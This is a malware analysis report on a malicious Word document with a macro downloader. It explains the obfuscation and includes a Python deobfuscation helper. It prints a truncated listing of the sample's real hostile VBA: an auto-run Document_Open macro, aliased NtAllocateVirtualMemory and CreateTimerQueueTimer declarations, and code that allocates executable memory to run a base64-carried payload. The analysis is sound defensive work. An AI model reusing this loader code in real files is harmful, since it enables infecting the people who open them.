Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39e5933d46bcdc90…

MALICIOUS

Office (OLE)

Size: 209.5 KB | Created: 2017-12-06 14:56:00 | Authoring application: Microsoft Office Word | First seen: 2017-12-09
MD5: 473500babd5f4afbeee82be60de3611f SHA-1: 43486f7030706588ed71dd16e7b06771ac3abf84 SHA-256: 39e5933d46bcdc90baeee09b4ea2419f872cfce5ff7b64f0dbabd13372d4067c
Risk Score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample with the signature Doc.Downloader.Macro-6539595-0, a downloader classification. The document carries a Document_Open VBA macro, so the code runs as soon as the document is opened with macros enabled. The VBA is obfuscated (dictionary-word identifiers, constants hidden behind integer arithmetic, API declarations split across #If/Win64 branches and aliased to throwaway names), but the imports it resolves are telling: NtAllocateVirtualMemory from ntdll and CreateTimerQueueTimer from Kernel32. Evaluating the arithmetic in the extracted code shows NtAllocateVirtualMemory being called with a process handle of -1 (the current process), a base address of 0, a region size of 9771 bytes, allocation type 4096 (MEM_COMMIT) and protection 64 (PAGE_EXECUTE_READWRITE). The helper nanosecond, whose declaration falls in the truncated part of the listing, is then called with that region, a pointer read out of a Variant, and a length of 5883, which is consistent with a memory copy into the fresh RWX buffer; a CreateTimerQueueTimer callback is a known way to execute such a buffer in-process without calling CreateThread. The sagittal module builds a byte lookup table that is the standard base64 decode alphabet, so the payload is most likely carried base64-encoded inside the macro rather than as a plain string. No network indicators (URLs, file paths) were recovered from the script, so the sample is not attributed to a family.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro: runs automatically when the document is opened with macros enabled
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    All eight are XML namespace identifiers (Adobe XMP, RDF, Dublin Core, Photoshop, DrawingML) carried in embedded image and drawing metadata. None is referenced by the macro, so they have no indicator value and should not be blocked or hunted on.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   17739 bytes
SHA-256: e7c1542ba3ba307b06fe2af8e0f6d372fdf49813785a093b2234d52dc01c8759

Script preview: first 1,000 lines of the extracted script (the listing is truncated at the end)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
Dim fortieth As Integer
Dim parliamentary As Long
repute = "echinococcus"
nofnof.demency
elapse = 29 + 22
 Pmt 0, elapse, 13315, 45089, 4
End Sub





Attribute VB_Name = "soade"
#If (23 - 13 + 390 + 29 - 83 + 354) > ((17 - 85 + 388) - (3 - 43 + 580) * 1) And Not ((109 - 59 - 22) - (118 - 14 - 76)) * 2 < (Win64) Then
Public Declare Function birthday _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (appear As Any, ByVal anthropometry As Any, ByVal commandment As Any, ByVal unmeant As Any, ByVal ding As Any, ByVal cherubim As Any, ByVal mauritian As Any) As Long
Public Declare Function garuda Lib _
"ntdll   " Alias _
"NtAllocateVirtualMemory" (knobkerrie As Long, totus As Long, ByVal apostolic As Long, sunstrokeByVal As Long, cockney As Long, ByVal aforementioned As Long) As Long
#ElseIf (12 - 85 + 473 + 13 - 125 + 412) > ((82 - 75 + 313) - (79 - 18 + 479) * 1) And ((52 - 23 - 1) - (7 - 108 + 129)) * 2 < (Win64) Then
Public Declare PtrSafe Function razorsharp Lib "Shlwapi.dll  " _
Alias "SleepConditionVariableSRW" (ByVal kedge As Any, maintainable As Any, nobody As Any, rustling As Any) As LongPtr
Public Declare PtrSafe Function birthday Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (swaddling As Any, ByVal bookclub As Any, ByVal uniat As Any, ByVal materialistic As Any, ByVal nonindulgent As Any, ByVal regalia As Any, ByVal anastomotic As Any) As Long
#End If
Function dunces(gastroboletus, eau, dahlia)
Select Case dahlia
Case 44 + (10 / 2 - 5)
dunces = gastroboletus \ eau
Case 54 + (5 - 3) / 2 - 1
dunces = gastroboletus And eau
Case 62 + (56 / 7 - 4 * 2)
dunces = gastroboletus * eau
End Select
End Function

Attribute VB_Name = "sagittal"
Function roundsman()
Dim capsella(255) As Byte
unvitrified = 74 - 2 - 7
Do While unvitrified <= 90 + 1
capsella(unvitrified) = unvitrified - 65
unvitrified = unvitrified + 1
Loop
unvitrified = 48
Do While unvitrified <= 50 + 8
capsella(unvitrified) = unvitrified + 4
unvitrified = unvitrified + 1
Loop
unvitrified = 97
Do While unvitrified <= 120 + 3
capsella(unvitrified) = unvitrified - 71
unvitrified = unvitrified + 1
Loop
capsella(47) = 63
unvitrified = 43
capsella(unvitrified) = 60 + 2
roundsman = capsella
End Function
Function lifelessly(churchdoor)
Dim firman As Byte
Dim equivocate As Variant
Dim bisexual As Integer
Dim blacken As Integer
#If (12 - 9 + 397 + 13 - 8 + 295) > ((128 - 95 + 287) - (118 - 83 + 505) * 1) And ((1 - 100 + 127) - (90 - 100 + 38)) * 2 < (Win64) Then
Dim lure As Byte
Dim mastotermitidae As LongPtr
chemiluminescent = 95 - 53 - 34
Dim aphonous As LongPtr
Dim biographer As Byte
Dim overwhelmingly As Integer
Dim cloaca As LongPtr
Dim blameworthiness As Integer
#ElseIf (56 - 20 + 364 + 33 - 124 + 391) > ((110 - 91 + 301) - (49 - 14 + 505) * 1) And Not ((4 - 19 + 43) - (15 - 14 + 27)) * 2 < (Win64) Then
Dim mastotermitidae As Long
chemiluminescent = 76 - 96 + 24
Dim aphonous As Long
Dim cloaca As Long
#End If
coparcener = VarPtr(mastotermitidae)
dashboard = nanosecond(coparcener, VarPtr(churchdoor) + 8, chemiluminescent)
basset = 87 - 71 - 17
aphonous = 80 - 113 + 33
condom = 6 - 53 + 47
cloaca = 46 - 106 + 9831
minnows = 102 - 19 + 4013
disculpate = 100 - 124 + 88
importunate = garuda(ByVal basset, _
aphonous, ByVal condom, cloaca, ByVal minnows, _
ByVal disculpate)
honi = Fix(374)

nothofagus = nothofagus

nanosecond aphonous, mastotermitidae, 23 - 70 + 5930
antigone = 9 + 9
 Pmt 0, antigone, 39177, 51259, 3

lifelessly = aphonous
End Function


Attribute VB_Name = "nofnof"
Function friable(donor) As String
Dim erinaceidae As Long
Dim acclivous(6962) As Byte
Dim cuminum As String
Dim accredit(63) As Long
betrothed = Math.Round(435)

Dim correspond
... (truncated)
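The following Python script is an added example for this report; it is not code from the sample, from oletools, or from the pipeline that produced this page. It automates the manual steps behind the findings above on a constructed excerpt of the macros.bas listing (the two Declare lines, the six constant assignments, the allocation call and the copy call, quoted from the listing): joining VBA line continuations, folding the integer arithmetic that hides constants, resolving Declare aliases back to real API names, and naming the arguments passed to NtAllocateVirtualMemory. It also re-implements sagittal.roundsman() in Python and checks its lookup table against the standard base64 alphabet. Every name, flag table and function outside the quoted macro lines is the example's own.

```python
import ast
import operator
import re

# Constructed excerpt: lines quoted from the macros.bas listing in this report.
# Paste the whole extracted file here for a complete folded listing.
SAMPLE_VBA = r'''
Public Declare Function garuda Lib _
"ntdll   " Alias _
"NtAllocateVirtualMemory" (knobkerrie As Long, totus As Long, ByVal apostolic As Long, sunstrokeByVal As Long, cockney As Long, ByVal aforementioned As Long) As Long
Public Declare PtrSafe Function birthday Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (swaddling As Any, ByVal bookclub As Any, ByVal uniat As Any, ByVal materialistic As Any, ByVal nonindulgent As Any, ByVal regalia As Any, ByVal anastomotic As Any) As Long
basset = 87 - 71 - 17
aphonous = 80 - 113 + 33
condom = 6 - 53 + 47
cloaca = 46 - 106 + 9831
minnows = 102 - 19 + 4013
disculpate = 100 - 124 + 88
importunate = garuda(ByVal basset, _
aphonous, ByVal condom, cloaca, ByVal minnows, _
ByVal disculpate)
nanosecond aphonous, mastotermitidae, 23 - 70 + 5930
'''

_CONTINUATION = re.compile(r"[ \t]_[ \t]*\r?\n[ \t]*")          # VBA ' _' line continuation
_ARITH = re.compile(r'(?<![\w"])\d+(?:\s*[-+*\\]\s*\d+)+(?![\w"])')  # flat int arithmetic, "\" = VBA int div
_DECLARE = re.compile(r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]*)"\s+Alias\s+"([^"]*)"',
                      re.IGNORECASE)
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(-?\d+)\s*$", re.MULTILINE)
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.FloorDiv: operator.floordiv}
# Parameter order of NtAllocateVirtualMemory and the flag values seen in this sample.
NT_ALLOC_PARAMS = ("ProcessHandle", "BaseAddress", "ZeroBits", "RegionSize", "AllocationType", "Protect")
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x3000: "MEM_COMMIT|MEM_RESERVE"}
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def join_continuations(text):
    """Merge ' _' continuations so every statement is one line for the regexes below."""
    return _CONTINUATION.sub(" ", text)


def _safe_eval(expr):
    """Evaluate integer + - * \\ arithmetic through the AST; any other node raises."""
    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
            return _BINOPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError("unsupported expression: " + expr)
    return ev(ast.parse(expr.replace("\\", "//"), mode="eval"))


def fold_constants(text):
    """Replace each arithmetic expression such as '46 - 106 + 9831' with its value."""
    return _ARITH.sub(lambda m: str(_safe_eval(m.group(0))), text)


def extract_declares(text):
    """alias -> (dll, real API). The DLL name is stripped: the sample pads it with
    trailing spaces ("ntdll   "), which the loader tolerates but a naive match does not."""
    return {alias: (dll.strip(), api) for alias, dll, api in _DECLARE.findall(text)}


def rename_aliases(text, declares):
    """Rewrite call sites (alias followed by '(') to the real API name."""
    for alias, (_dll, api) in declares.items():
        text = re.sub(r"\b%s\b(?=\s*\()" % re.escape(alias), api, text)
    return text


def explain_nt_allocate(text, assignments):
    """Name the NtAllocateVirtualMemory arguments and decode the flag values."""
    m = re.search(r"NtAllocateVirtualMemory\(([^)]*)\)", text)
    if not m:
        return None
    args = [a.replace("ByVal", "").strip() for a in m.group(1).split(",")]
    out = {}
    for name, arg in zip(NT_ALLOC_PARAMS, args):
        out[name] = int(arg) if re.fullmatch(r"-?\d+", arg) else assignments.get(arg, arg)
    out["AllocationType"] = MEM_FLAGS.get(out["AllocationType"], out["AllocationType"])
    out["Protect"] = PAGE_PROTECT.get(out["Protect"], out["Protect"])
    if out["ProcessHandle"] == -1:
        out["ProcessHandle"] = "-1 (current process)"
    return out


def analyze(vba_text):
    """Fold, resolve and explain; returns declares, the decoded allocation and the folded source."""
    text = fold_constants(join_continuations(vba_text))
    declares = extract_declares(text)
    text = rename_aliases(text, declares)
    assignments = {name: int(val) for name, val in _ASSIGN.findall(text)}
    return {"declares": declares, "nt_allocate": explain_nt_allocate(text, assignments), "deobfuscated": text}


def roundsman_table():
    """Python re-implementation of sagittal.roundsman() with the VBA loop bounds evaluated."""
    table = [0] * 256
    for lo, hi, delta in ((65, 91, -65), (48, 58, 4), (97, 123, -71)):  # 74-2-7..90+1, 48..50+8, 97..120+3
        for c in range(lo, hi + 1):
            table[c] = c + delta
    table[47], table[43] = 63, 60 + 2   # '/' and '+'
    return table


STD_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def matches_base64_alphabet(table):
    """True if the table maps every standard base64 character to its 6-bit value."""
    return all(table[ord(ch)] == i for i, ch in enumerate(STD_B64))


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    for alias, (dll, api) in result["declares"].items():
        print(f"{alias:10} -> {dll}!{api}")
    print(result["nt_allocate"])
    print("roundsman() is the base64 decode table:", matches_base64_alphabet(roundsman_table()))
```

On the excerpt this resolves garuda to ntdll!NtAllocateVirtualMemory and birthday to Kernel32!CreateTimerQueueTimer, reports the allocation as ProcessHandle -1, RegionSize 9771, MEM_COMMIT, PAGE_EXECUTE_READWRITE, folds the copy length to 5883, and confirms that roundsman() yields the standard base64 decode table. Two caveats when turning this into detection: match DLL names only after stripping whitespace, since the padded "ntdll   " and "Shlwapi.dll  " defeat a literal Lib "ntdll" pattern; and do not count the razorsharp/SleepConditionVariableSRW declaration as a capability, because it names Shlwapi.dll although that function is exported by Kernel32 and it is never called in the visible code.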